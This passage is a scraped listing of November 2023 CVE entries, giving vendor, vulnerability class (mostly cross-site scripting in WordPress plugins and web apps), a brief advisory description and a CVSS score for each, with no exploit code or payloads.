Symfony is a PHP framework for web and console applications and a set of reusable PHP components.

6.1
2023-11-10 CVE-2023-47119 Discourse Cross-site Scripting vulnerability in Discourse

Discourse is an open source platform for community discussion.

6.1
2023-11-10 CVE-2023-6075 Phpgurukul Cross-site Scripting vulnerability in PHPgurukul Restaurant Table Booking System 1.0

A vulnerability classified as problematic has been found in PHPGurukul Restaurant Table Booking System 1.0.

6.1
2023-11-10 CVE-2023-47164 Digitaldruid Cross-site Scripting vulnerability in Digitaldruid Hoteldruid

Cross-site scripting vulnerability in HOTELDRUID 3.0.5 and earlier allows a remote unauthenticated attacker to execute an arbitrary script on the web browser of the user who is logging in to the product.

6.1
2023-11-10 CVE-2023-46729 Sentry Server-Side Request Forgery (SSRF) vulnerability in Sentry Software Development KIT

sentry-javascript provides Sentry SDKs for JavaScript.

6.1
2023-11-09 CVE-2023-5541 Moodle Cross-site Scripting vulnerability in Moodle

The CSV grade import method contained an XSS risk for users importing the spreadsheet, if it contained unsafe content.

6.1
2023-11-09 CVE-2023-5547 Moodle
Redhat
Fedoraproject
Cross-site Scripting vulnerability in multiple products

The course upload preview contained an XSS risk for users uploading unsafe data.

6.1
2023-11-09 CVE-2023-47612 Telit Files or Directories Accessible to External Parties vulnerability in Telit products

A CWE-552: Files or Directories Accessible to External Parties vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow an attacker with physical access to the target system to obtain a read/write access to any files and directories on the targeted system, including hidden files and directories.

6.1
2023-11-09 CVE-2023-47488 Combodo Cross-site Scripting vulnerability in Combodo Itop 3.1.0211973

Cross Site Scripting vulnerability in Combodo iTop v.3.1.0-2-11973 allows a local attacker to obtain sensitive information via a crafted script to the attrib_manager_id parameter in the General Information page and the id parameter in the contact page.

6.1
2023-11-09 CVE-2023-46492 Mldb Cross-site Scripting vulnerability in Mldb Machine Learning Database 2017.04.17.0

Cross Site Scripting vulnerability in MLDB.ai v.2017.04.17.0 allows a remote attacker to execute arbitrary code via a crafted payload to the public_html/doc/index.html.

6.1
2023-11-09 CVE-2023-37533 Hcltech Cross-site Scripting vulnerability in Hcltech Connections 8.0

HCL Connections is vulnerable to reflected cross-site scripting (XSS) where an attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user after visiting the vulnerable URL which contains the malicious script code.

6.1
2023-11-08 CVE-2023-47114 Ethyca Cross-site Scripting vulnerability in Ethyca Fides

Fides is an open-source privacy engineering platform for managing the fulfillment of data privacy requests in your runtime environment, and the enforcement of privacy regulations in your code.

6.1
2023-11-08 CVE-2023-46643 Cloudnet360 Cross-site Scripting vulnerability in Cloudnet360

Unauth.

6.1
2023-11-08 CVE-2023-32298 Helgatheviking Cross-site Scripting vulnerability in Helgatheviking Simple User Listing

Unauth.

6.1
2023-11-08 CVE-2023-46621 Enejbajgoric Gagansandhu Ctltdev Cross-site Scripting vulnerability in Enejbajgoric/Gagansandhu/Ctltdev User Avatar

Unauth.

6.1
2023-11-08 CVE-2023-46626 Flowfact Cross-site Scripting vulnerability in Flowfact

Unauth.

6.1
2023-11-08 CVE-2023-46627 Freelancer Coder Cross-site Scripting vulnerability in Freelancer-Coder Wordpress Simple Html Sitemap 1.0/2.0/2.1

Unauth.

6.1
2023-11-08 CVE-2023-6002 Yugabyte Cross-site Scripting vulnerability in Yugabyte Yugabytedb

YugabyteDB is vulnerable to cross site scripting (XSS) via log injection. Writing invalidated user input to log files can allow an unprivileged attacker to forge log entries or inject malicious content into the logs.

6.1
2023-11-07 CVE-2023-46252 Squidex IO Cross-site Scripting vulnerability in Squidex.Io Squidex 7.8.2

Squidex is an open source headless CMS and content management hub.

6.1
2023-11-07 CVE-2023-32966 Crudlab Cross-Site Request Forgery (CSRF) vulnerability in Crudlab Jazz Popups

Cross-Site Request Forgery (CSRF) vulnerability in CRUDLab Jazz Popups leads to Stored XSS.This issue affects Jazz Popups: from n/a through 1.8.7.

6.1
2023-11-07 CVE-2023-41425 Wondercms Cross-site Scripting vulnerability in Wondercms

Cross Site Scripting vulnerability in Wonder CMS v.3.2.0 thru v.3.4.2 allows a remote attacker to execute arbitrary code via a crafted script uploaded to the installModule component.

6.1
2023-11-07 CVE-2021-4431 Msyk Cross-site Scripting vulnerability in Msyk Fmdataapi

A vulnerability classified as problematic has been found in msyk FMDataAPI up to 22.

6.1
2023-11-07 CVE-2023-47510 Wpsolutions HQ Cross-site Scripting vulnerability in Wpsolutions-Hq Wpdbspringclean

Unauth.

6.1
2023-11-07 CVE-2019-25156 Dstar2018 Cross-site Scripting vulnerability in Dstar2018 Agency

A vulnerability classified as problematic was found in dstar2018 Agency up to 61.

6.1
2023-11-07 CVE-2023-46998 Bootboxjs Cross-site Scripting vulnerability in Bootboxjs Bootbox

Cross Site Scripting vulnerability in BootBox Bootbox.js v.3.2 through 6.0 allows a remote attacker to execute arbitrary code via a crafted payload to alert(), confirm(), prompt() functions.

6.1
2023-11-07 CVE-2019-25155 Cure53 Open Redirect vulnerability in Cure53 Dompurify

DOMPurify before 1.0.11 allows reverse tabnabbing in demos/hooks-target-blank-demo.html because links lack a 'rel="noopener noreferrer"' attribute.

6.1
2023-11-06 CVE-2023-5354 Getawesomesupport Cross-site Scripting vulnerability in Getawesomesupport Awesome Support

The Awesome Support WordPress plugin before 6.1.5 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

6.1
2023-11-06 CVE-2023-5771 Proofpoint Cross-site Scripting vulnerability in Proofpoint Enterprise Protection

Proofpoint Enterprise Protection contains a stored XSS vulnerability in the AdminUI.

6.1
2023-11-06 CVE-2022-48192 Softing Cross-site Scripting vulnerability in Softing Smartlink Sw-Ht

Cross-site Scripting vulnerability in Softing smartLink SW-HT before 1.30, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

6.1
2023-11-06 CVE-2023-46732 Xwiki Cross-site Scripting vulnerability in Xwiki

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it.

6.1
2023-11-06 CVE-2023-46251 Mybb Cross-site Scripting vulnerability in Mybb

MyBB is a free and open source forum software.

6.1
2023-11-06 CVE-2023-5950 Rapid7 Cross-site Scripting vulnerability in Rapid7 Velociraptor

Rapid7 Velociraptor versions prior to 0.7.0-4 suffer from a reflected cross site scripting vulnerability.

6.1
2023-11-06 CVE-2023-47185 Gvectors Cross-site Scripting vulnerability in Gvectors Wpdiscuz

Unauth.

6.1
2023-11-06 CVE-2023-46822 Visser Cross-site Scripting vulnerability in Visser Store Exporter for Woocommerce

Unauth.

6.1
2023-11-06 CVE-2023-47272 Roundcube
Fedoraproject
Debian
Cross-site Scripting vulnerability in multiple products

Roundcube 1.5.x before 1.5.6 and 1.6.x before 1.6.5 allows XSS via a Content-Type or Content-Disposition header (used for attachment preview or download).

6.1
2023-11-08 CVE-2022-48613 Huawei Race Condition vulnerability in Huawei Emui and Harmonyos

Race condition vulnerability in the kernel module.

5.9
2023-11-10 CVE-2023-45167 IBM Unspecified vulnerability in IBM AIX and Vios

IBM AIX's 7.3 Python implementation could allow a non-privileged local user to exploit a vulnerability to cause a denial of service.

5.5
2023-11-09 CVE-2023-6039 Linux Use After Free vulnerability in Linux Kernel

A use-after-free flaw was found in lan78xx_disconnect in drivers/net/usb/lan78xx.c in the network sub-component, net/usb/lan78xx in the Linux Kernel.

5.5
2023-11-09 CVE-2023-47615 Telit Unspecified vulnerability in Telit products

A CWE-526: Exposure of Sensitive Information Through Environmental Variables vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow a local, low privileged attacker to get access to a sensitive data on the targeted system.

5.5
2023-11-08 CVE-2023-4891 Lenovo Use After Free vulnerability in Lenovo View Driver

A potential use-after-free vulnerability was reported in the Lenovo View driver that could result in denial of service.

5.5
2023-11-08 CVE-2023-46362 Jbig2Enc Project Use After Free vulnerability in Jbig2Enc Project Jbig2Enc 0.28

jbig2enc v0.28 was discovered to contain a heap-use-after-free via jbig2enc_auto_threshold_using_hash in src/jbig2enc.cc.

5.5
2023-11-08 CVE-2023-46363 Jbig2Enc Project Unspecified vulnerability in Jbig2Enc Project Jbig2Enc 0.28

jbig2enc v0.28 was discovered to contain a SEGV via jbig2_add_page in src/jbig2enc.cc:512.

5.5
2023-11-08 CVE-2023-5136 NI Incorrect Permission Assignment for Critical Resource vulnerability in NI products

An incorrect permission assignment in the TopoGrafix DataPlugin for GPX could result in information disclosure.

5.5
2023-11-07 CVE-2023-46001 Gpac Classic Buffer Overflow vulnerability in Gpac 2.3Devrev573G201320819Master

Buffer Overflow vulnerability in gpac MP4Box v.2.3-DEV-rev573-g201320819-master allows a local attacker to cause a denial of service via the gpac/src/isomedia/isom_read.c:2807:51 function in gf_isom_get_user_data.

5.5
2023-11-07 CVE-2023-4272 ARM Unspecified vulnerability in ARM products

A local non-privileged user can make GPU processing operations that expose sensitive data from previously freed memory.

5.5
2023-11-07 CVE-2023-42527 Samsung Improper Input Validation vulnerability in Samsung Android 11.0/12.0

Improper input validation vulnerability in ProcessWriteFile of libsec-ril prior to SMR Nov-2023 Release 1 allows local attackers to expose sensitive information.

5.5
2023-11-07 CVE-2023-42534 Samsung Files or Directories Accessible to External Parties vulnerability in Samsung Android 12.0/13.0

Improper input validation vulnerability in ChooserActivity prior to SMR Nov-2023 Release 1 allows local attackers to read arbitrary files with system privilege.

5.5
2023-11-07 CVE-2023-42539 Samsung Unspecified vulnerability in Samsung Health

PendingIntent hijacking vulnerability in ChallengeNotificationManager in Samsung Health prior to version 6.25 allows local attackers to access data.

5.5
2023-11-07 CVE-2023-42540 Samsung Unspecified vulnerability in Samsung Account

Improper access control vulnerability in Samsung Account prior to version 14.5.01.1 allows attackers to access sensitive information via implicit intent.

5.5
2023-11-07 CVE-2023-42544 Samsung Unspecified vulnerability in Samsung Quick Share 13.1.2.4/3.5.14.18/3.5.16.20

Improper access control vulnerability in Quick Share prior to 13.5.52.0 allows local attacker to access local files.

5.5
2023-11-07 CVE-2023-42555 Samsung Unspecified vulnerability in Samsung Easysetup

Use of implicit intent for sensitive communication vulnerability in EasySetup prior to version 11.1.13 allows attackers to get the bluetooth address of user device.

5.5
2023-11-07 CVE-2023-28553 Qualcomm Unspecified vulnerability in Qualcomm products

Information Disclosure in WLAN Host when processing WMI event command.

5.5
2023-11-07 CVE-2023-28554 Qualcomm Unspecified vulnerability in Qualcomm products

Information Disclosure in Qualcomm IPC while reading values from shared memory in VM.

5.5
2023-11-07 CVE-2023-28563 Qualcomm Unspecified vulnerability in Qualcomm products

Information disclosure in IOE Firmware while handling WMI command.

5.5
2023-11-07 CVE-2023-28566 Qualcomm Unspecified vulnerability in Qualcomm products

Information disclosure in WLAN HAL while handling the WMI state info command.

5.5
2023-11-07 CVE-2023-28568 Qualcomm Unspecified vulnerability in Qualcomm products

Information disclosure in WLAN HAL when reception status handler is called.

5.5
2023-11-07 CVE-2023-28569 Qualcomm Unspecified vulnerability in Qualcomm products

Information disclosure in WLAN HAL while handling command through WMI interfaces.

5.5
2023-11-07 CVE-2023-35140 Zyxel Improper Privilege Management vulnerability in Zyxel products

The improper privilege management vulnerability in the Zyxel GS1900-24EP switch firmware version V2.70(ABTO.5) could allow an authenticated local user with read-only access to modify system settings on a vulnerable device.

5.5
2023-11-07 CVE-2023-5748 Synology Classic Buffer Overflow vulnerability in Synology SSL VPN Client

Buffer copy without checking size of input ('Classic Buffer Overflow') vulnerability in cgi component in Synology SSL VPN Client before 1.4.7-0687 allows local users to conduct denial-of-service attacks via unspecified vectors.

5.5
2023-11-06 CVE-2023-4910 Redhat Exposure of Resource to Wrong Sphere vulnerability in Redhat 3Scale API Management 2.0

A flaw was found In 3Scale Admin Portal.

5.5
2023-11-06 CVE-2023-5090 Linux
Redhat
Improper Handling of Exceptional Conditions vulnerability in multiple products

A flaw was found in KVM.

5.5
2023-11-06 CVE-2023-32825 Google Out-of-bounds Read vulnerability in Google Android 13.0

In bluethooth service, there is a possible out of bounds reads due to improper input validation.

5.5
2023-11-06 CVE-2023-46802 NTA XXE vulnerability in NTA E-Tax 1.17.1

e-Tax software Version3.0.10 and earlier improperly restricts XML external entity references (XXE) due to the configuration of the embedded XML parser.

5.5
2023-11-11 CVE-2023-43057 IBM Cross-site Scripting vulnerability in IBM Qradar Security Information and Event Manager 7.5.0

IBM QRadar SIEM 7.5.0 is vulnerable to cross-site scripting.

5.4
2023-11-10 CVE-2023-45806 Discourse Unspecified vulnerability in Discourse

Discourse is an open source platform for community discussion.

5.4
2023-11-10 CVE-2023-46130 Discourse Allocation of Resources Without Limits or Throttling vulnerability in Discourse

Discourse is an open source platform for community discussion.

5.4
2023-11-09 CVE-2023-5544 Moodle
Redhat
Fedoraproject
Authorization Bypass Through User-Controlled Key vulnerability in multiple products

Wiki comments required additional sanitizing and access restrictions to prevent a stored XSS risk and potential IDOR risk.

5.4
2023-11-09 CVE-2023-5546 Moodle
Redhat
Fedoraproject
Cross-site Scripting vulnerability in multiple products

ID numbers displayed in the quiz grading report required additional sanitizing to prevent a stored XSS risk.

5.4
2023-11-09 CVE-2023-45885 Nasa Cross-site Scripting vulnerability in Nasa Openmct

Cross Site Scripting (XSS) vulnerability in NASA Open MCT (aka openmct) through 3.1.0 allows attackers to run arbitrary code via the new component feature in the flexibleLayout plugin.

5.4
2023-11-09 CVE-2023-37790 Broadcom Cross-site Scripting vulnerability in Broadcom Clarity 14.3.0.298

Jaspersoft Clarity PPM version 14.3.0.298 was discovered to contain an arbitrary file upload vulnerability via the Profile Picture Upload function.

5.4
2023-11-08 CVE-2023-47190 Apollo13Themes Cross-site Scripting vulnerability in Apollo13Themes Apollo13 Framework Extensions

Auth.

5.4
2023-11-08 CVE-2023-47229 Vyasdipen Cross-site Scripting vulnerability in Vyasdipen TOP 25 Social Icons

Auth.

5.4
2023-11-08 CVE-2023-47231 Bainternet Cross-site Scripting vulnerability in Bainternet Shortcodes UI

Auth.

5.4
2023-11-08 CVE-2023-47379 Microweber Cross-site Scripting vulnerability in Microweber 2.0.1

Microweber CMS version 2.0.1 is vulnerable to stored Cross Site Scripting (XSS) via the profile picture file upload functionality.

5.4
2023-11-08 CVE-2023-46613 ADD TO Calendar Button Cross-site Scripting vulnerability in Add-To-Calendar-Button ADD to Calendar Button

Auth.

5.4
2023-11-08 CVE-2023-46640 Mauvedev Cross-site Scripting vulnerability in Mauvedev Medialist

Auth.

5.4
2023-11-08 CVE-2023-46483 Timeteccloud Cross-site Scripting vulnerability in Timeteccloud Auto Web-Based Database Management System 2.0

Cross Site Scripting vulnerability in timetec AWDMS v.2.0 allows an attacker to obtain sensitive information via a crafted payload to the remark parameter of the New Zone function.

5.4
2023-11-07 CVE-2023-5982 Updraftplus Cross-Site Request Forgery (CSRF) vulnerability in Updraftplus

The UpdraftPlus: WordPress Backup & Migration Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.23.10.

5.4
2023-11-07 CVE-2023-28499 Simonpedge Cross-site Scripting vulnerability in Simonpedge Slide Anything-Responsive Content/Html Slider and Carousel

Auth.

5.4
2023-11-07 CVE-2023-46744 Squidex IO Cross-site Scripting vulnerability in Squidex.Io Squidex

Squidex is an open source headless CMS and content management hub.

5.4
2023-11-07 CVE-2023-4842 Warfareplugins Cross-site Scripting vulnerability in Warfareplugins Social Warfare

The Social Sharing Plugin - Social Warfare plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'social_warfare' shortcode in versions up to, and including, 4.4.3 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-4888 Illia Cross-site Scripting vulnerability in Illia Simple Like Page

The Simple Like Page Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'sfp-page-plugin' shortcode in versions up to, and including, 1.5.1 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5567 Spreendigital Cross-site Scripting vulnerability in Spreendigital QR Code TAG

The QR Code Tag plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'qrcodetag' shortcode in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5577 Bitly Cross-site Scripting vulnerability in Bitly

The Bitly's plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpbitly' shortcode in all versions up to, and including, 2.7.1 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5659 Tryinteract Cross-site Scripting vulnerability in Tryinteract Interact:Embed a Quiz on Your Site

The Interact: Embed A Quiz On Your Site plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'interact-quiz' shortcode in all versions up to, and including, 3.0.7 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5660 Pressified Cross-site Scripting vulnerability in Pressified Sendpress

The SendPress Newsletters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.22.3.31 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5661 WEB Settler Cross-site Scripting vulnerability in Web-Settler Social Feed

The Social Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'socialfeed' shortcode in all versions up to, and including, 1.5.4.6 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5669 Christiaanconover Cross-site Scripting vulnerability in Christiaanconover Featured Image Caption

The Featured Image Caption plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode and post meta in all versions up to, and including, 0.8.10 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5703 Giftup Cross-site Scripting vulnerability in Giftup Gift UP Gift Cards for Wordpress and Woocommerce

The Gift Up Gift Cards for WordPress and WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'giftup' shortcode in all versions up to, and including, 2.20.1 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5507 Imagemapper Project Cross-site Scripting vulnerability in Imagemapper Project Imagemapper 1.2.6

The ImageMapper plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'imagemap' shortcode in versions up to, and including, 1.2.6 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5658 Chandnipatel Cross-site Scripting vulnerability in Chandnipatel WP Mapit

The WP MapIt plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_mapit' shortcode in all versions up to, and including, 2.7.1 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5743 Gravitydesign Cross-site Scripting vulnerability in Gravitydesign Telephone Number Linker

The Telephone Number Linker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'telnumlink' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes.

5.4
2023-11-07 CVE-2023-5076 Ziteboard Cross-site Scripting vulnerability in Ziteboard

The Ziteboard Online Whiteboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ziteboard' shortcode in versions up to, and including, 2.9.9 due to insufficient input sanitization and output escaping.

5.4
2023-11-07 CVE-2023-38549 Veeam Cross-site Scripting vulnerability in Veeam ONE

A vulnerability in Veeam ONE allows an unprivileged user who has access to the Veeam ONE Web Client the ability to acquire the NTLM hash of the account used by the Veeam ONE Reporting Service.

5.4
2023-11-07 CVE-2023-5903 SFU Unspecified vulnerability in SFU PKP web Application Library

Cross-site Scripting (XSS) - Stored in GitHub repository pkp/pkp-lib prior to 3.3.0-16.

5.4
2023-11-07 CVE-2023-5904 SFU Unspecified vulnerability in SFU PKP web Application Library

Cross-site Scripting (XSS) - Stored in GitHub repository pkp/pkp-lib prior to 3.3.0-16.

5.4
2023-11-06 CVE-2023-36769 Microsoft Unspecified vulnerability in Microsoft Onenote

Microsoft OneNote Spoofing Vulnerability

5.4
2023-11-06 CVE-2023-45556 Mybb Cross-site Scripting vulnerability in Mybb

Cross Site Scripting vulnerability in Mybb Mybb Forums v.1.8.33 allows a local attacker to execute arbitrary code via the theme Name parameter in the theme management component.

5.4
2023-11-06 CVE-2023-46782 Chrisyee Cross-site Scripting vulnerability in Chrisyee Momentopress for Momento360 1.0.0/1.0.1

Auth.

5.4
2023-11-06 CVE-2023-46783 Brightplugins Cross-site Scripting vulnerability in Brightplugins Pre-Orders for Woocommerce

Auth.

5.4
2023-11-06 CVE-2023-47177 Pojo Cross-site Scripting vulnerability in Pojo Linker

Auth.

5.4
2023-11-10 CVE-2023-47122 Sigstore Improper Verification of Cryptographic Signature vulnerability in Sigstore Gitsign 0.6.0/0.7.0/0.7.1

Gitsign is software for keyless Git signing using Sigstore.

5.3
2023-11-09 CVE-2023-5545 Moodle
Fedoraproject
Exposure of Resource to Wrong Sphere vulnerability in multiple products

H5P metadata automatically populated the author with the user's username, which could be sensitive information.

5.3
2023-11-09 CVE-2023-5548 Moodle
Fedoraproject
Insufficient Verification of Data Authenticity vulnerability in multiple products

Stronger revision number limitations were required on file serving endpoints to improve cache poisoning protection.

5.3
2023-11-09 CVE-2023-5549 Moodle
Fedoraproject
Improper Privilege Management vulnerability in multiple products

Insufficient web service capability checks made it possible to move categories a user had permission to manage, to a parent category they did not have the capability to manage.

5.3
2023-11-09 CVE-2023-45284 Golang Unspecified vulnerability in Golang GO

On Windows, The IsLocal function does not correctly detect reserved device names in some cases.

5.3
2023-11-09 CVE-2023-47110 Prestashop Unspecified vulnerability in Prestashop Customer Reassurance Block

blockreassurance adds an information block aimed at offering helpful information to reassure customers that their store is trustworthy.

5.3
2023-11-08 CVE-2023-46756 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Permission control vulnerability in the window management module.

5.3
2023-11-08 CVE-2023-46755 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Vulnerability of input parameters being not strictly verified in the input.

5.3
2023-11-08 CVE-2023-46763 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Vulnerability of background app permission management in the framework module.

5.3
2023-11-08 CVE-2023-46764 Huawei Unspecified vulnerability in Huawei Emui and Harmonyos

Unauthorized startup vulnerability of background apps.

5.3
2023-11-07 CVE-2023-46737 Sigstore Infinite Loop vulnerability in Sigstore Cosign

Cosign is a sigstore signing tool for OCI containers.

5.3
2023-11-07 CVE-2023-46819 Apache Missing Authentication for Critical Function vulnerability in Apache Ofbiz

Missing Authentication in Apache Software Foundation Apache OFBiz when using the Solr plugin. This issue affects Apache OFBiz: before 18.12.09.  Users are recommended to upgrade to version 18.12.09

5.3
2023-11-07 CVE-2023-42541 Samsung Incorrect Authorization vulnerability in Samsung Push Service

Improper authorization in PushClientProvider of Samsung Push Service prior to version 3.4.10 allows attacker to access unique id.

5.3
2023-11-07 CVE-2023-42553 Samsung Unspecified vulnerability in Samsung Email 6.1.82.0

Improper authorization verification vulnerability in Samsung Email prior to version 6.1.90.4 allows attackers to read sandbox data of email.

5.3
2023-11-07 CVE-2023-47102 Urbackup Information Exposure Through Discrepancy vulnerability in Urbackup Server 2.5.31

UrBackup Server 2.5.31 allows brute-force enumeration of user accounts because a failure message confirms that a username is not valid.

5.3
2023-11-06 CVE-2023-5678 Openssl Improper Check for Unusual or Exceptional Conditions vulnerability in Openssl

Issue summary: Generating excessively long X9.42 DH keys or checking excessively long X9.42 DH keys or parameters may be very slow. Impact summary: Applications that use the functions DH_generate_key() to generate an X9.42 DH key may experience long delays.

5.3
2023-11-06 CVE-2023-5969 Mattermost Resource Exhaustion vulnerability in Mattermost

Mattermost fails to properly sanitize the request to /api/v4/redirect_location allowing an attacker, sending a specially crafted request to /api/v4/redirect_location, to fill up the memory due to caching large items.

5.3
2023-11-06 CVE-2023-5831 Gitlab Unspecified vulnerability in Gitlab

An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.0 before 16.3.6, all versions starting from 16.4 before 16.4.2, and all versions starting from 16.5.0 before 16.5.1 which have the `super_sidebar_logged_out` feature flag enabled.

5.3
2023-11-06 CVE-2023-4625 Mitsubishielectric Improper Restriction of Excessive Authentication Attempts vulnerability in Mitsubishielectric products

Improper Restriction of Excessive Authentication Attempts vulnerability in Mitsubishi Electric Corporation MELSEC iQ-F/iQ-R Series CPU modules Web server function allows a remote unauthenticated attacker to prevent legitimate users from logging into the Web server function for a certain period after the attacker has attempted to log in illegally by continuously attempting unauthorized login to the Web server function.

5.3
2023-11-06 CVE-2023-47271 SFU Unspecified vulnerability in SFU PKP web Application Library

PKP-WAL (aka PKP Web Application Library or pkp-lib) before 3.3.0-16, as used in Open Journal Systems (OJS) and other products, does not verify that the file named in an XML document (used for the native import/export plugin) is an image file, before trying to use it for an issue cover image.

5.3
2023-11-09 CVE-2023-4218 Eclipse XXE vulnerability in Eclipse IDE

In Eclipse IDE versions < 2023-09 (4.29) some files with xml content are parsed vulnerable against all sorts of XXE attacks.

5.0
2023-11-07 CVE-2023-46851 Apache External Control of File Name or Path vulnerability in Apache Allura

Allura Discussion and Allura Forum importing does not restrict URL values specified in attachments.

4.9
2023-11-06 CVE-2023-5968 Mattermost Improper Encoding or Escaping of Output vulnerability in Mattermost

Mattermost fails to properly sanitize the user object when updating the username, resulting in the password hash being included in the response body. 

4.9
2023-11-09 CVE-2023-36688 Idoweb Cross-site Scripting vulnerability in Idoweb Simple Site Verify

Auth.

4.8
2023-11-08 CVE-2023-47181 Northernbeacheswebsites Cross-site Scripting vulnerability in Northernbeacheswebsites Ideapush

Auth.

4.8
2023-11-08 CVE-2023-47223 Wpmapplugins Cross-site Scripting vulnerability in Wpmapplugins Basic Interactive World MAP

Auth.

4.8
2023-11-08 CVE-2023-47226 I13Websolution Cross-site Scripting vulnerability in I13Websolution Post Sliders & Post Grids

Auth.

4.8
2023-11-08 CVE-2023-47227 WEB Settler Cross-site Scripting vulnerability in Web-Settler Social Feed | ALL Social Media in ONE Place

Auth.

4.8
2023-11-08 CVE-2023-47228 WEB Settler Cross-site Scripting vulnerability in Web-Settler Layer Slider

Auth.

4.8
2023-11-08 CVE-2023-46642 Sahu Cross-site Scripting vulnerability in Sahu Tiktok Pixel for E-Commerce

Auth.

4.8
2023-11-07 CVE-2023-5819 Gara Cross-site Scripting vulnerability in Gara Amazonify

The Amazonify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 0.8.1 due to insufficient input sanitization and output escaping.

4.8
2023-11-07 CVE-2023-5901 SFU Cross-site Scripting vulnerability in SFU PKP web Application Library

Cross-site Scripting in GitHub repository pkp/pkp-lib prior to 3.3.0-16.

4.8
2023-11-06 CVE-2023-4810 Wpdarko Cross-site Scripting vulnerability in Wpdarko Responsive Pricing Table

The Responsive Pricing Table WordPress plugin before 5.1.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

4.8
2023-11-06 CVE-2023-4858 Topcode Cross-site Scripting vulnerability in Topcode Simple Table Manager

The Simple Table Manager WordPress plugin through 1.5.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

4.8
2023-11-06 CVE-2023-5181 Sarveshmrao Cross-site Scripting vulnerability in Sarveshmrao WP Discord Invite

The WP Discord Invite WordPress plugin before 2.5.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

4.8
2023-11-06 CVE-2023-5228 Wpeverest Cross-site Scripting vulnerability in Wpeverest User Registration

The User Registration WordPress plugin before 3.0.4.2 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).

4.8
2023-11-06 CVE-2023-5530 Ninjaforms Cross-site Scripting vulnerability in Ninjaforms Ninja Forms

The Ninja Forms Contact Form WordPress plugin before 3.6.34 does not sanitize and escape its label fields, which could allow high privilege users such as admin to perform Stored XSS attacks.

4.8
2023-11-06 CVE-2023-5605 Kaizencoders Cross-site Scripting vulnerability in Kaizencoders URL Shortify

The URL Shortify WordPress plugin before 1.7.9.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)

4.8
2023-11-06 CVE-2023-23702 Pixelgrade Cross-site Scripting vulnerability in Pixelgrade Comments Rating

Auth.

4.8
2023-11-06 CVE-2023-46824 Omaksolutions Cross-site Scripting vulnerability in Omaksolutions Slick Popup

Auth.

4.8
2023-11-06 CVE-2023-47184 Properfraction Cross-site Scripting vulnerability in Properfraction Admin BAR & Dashboard Access Control

Auth.

4.8
2023-11-09 CVE-2023-47616 Telit Unspecified vulnerability in Telit products

A CWE-200: Exposure of Sensitive Information to an Unauthorized Actor vulnerability exists in Telit Cinterion BGS5, Telit Cinterion EHS5/6/8, Telit Cinterion PDS5/6/8, Telit Cinterion ELS61/81, Telit Cinterion PLS62 that could allow an attacker with physical access to the target system to get access to a sensitive data on the targeted system.

4.6
2023-11-08 CVE-2023-45140 OVH Missing Authentication for Critical Function vulnerability in OVH The-Bastion

The Bastion provides authentication, authorization, traceability and auditability for SSH accesses.

4.6
2023-11-08 CVE-2023-43572 Lenovo Out-of-bounds Read vulnerability in Lenovo products

A buffer over-read was reported in the BiosExtensionLoader module in some Lenovo Desktop products that may allow a local attacker with elevated privileges to disclose sensitive information.

4.4
